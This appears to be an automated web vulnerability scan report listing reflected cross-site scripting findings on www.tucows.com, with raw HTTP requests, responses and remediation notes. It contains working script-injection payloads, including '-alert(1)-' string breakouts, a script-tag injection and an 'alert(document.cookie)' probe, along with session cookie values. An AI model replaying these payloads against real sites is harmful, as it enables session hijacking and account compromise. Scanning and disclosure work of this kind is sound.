GET /includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca09d"-alert(1)-"a861b895462 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78125"-alert(1)-"fa4d78589f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32536
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8817"-alert(1)-"edfcd1015e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7526e"-alert(1)-"6df19e35abd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:12 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31902
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3691"-alert(1)-"68987ea07e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.htmlb3691"-alert(1)-"68987ea07e0 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.375. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0f6"-alert(1)-"63213006432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.html?4d0f6"-alert(1)-"63213006432=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a0f"-alert(1)-"d3b3f7c7cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 20:31:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=0a1b30a86b03c7fe7a0105c8c64ed6cc; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 0a1b30a86b03c7fe7a0105c8c64ed6cc=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 212c1"-alert(1)-"9b74dc28a7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850212c1"-alert(1)-"9b74dc28a7b/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 20:31:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=4a96b6ea2fb1ff12ea5cbccab443adca; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4a96b6ea2fb1ff12ea5cbccab443adca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd8d"><script>alert(1)</script>19ee22f0cfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7e"-alert(1)-"8990b025cf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850/x2246b7e"-alert(1)-"8990b025cf5 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.380. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/preview/194850/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8153d"-alert(1)-"891c6dec5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab0"-alert(1)-"6b16cc9a4b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.382. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4b0"-alert(1)-"dc8c1805ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 36886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edf7"-alert(1)-"26f2d744f54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.html9edf7"-alert(1)-"26f2d744f54 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:33:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.384. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95630"-alert(1)-"ad45798eea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
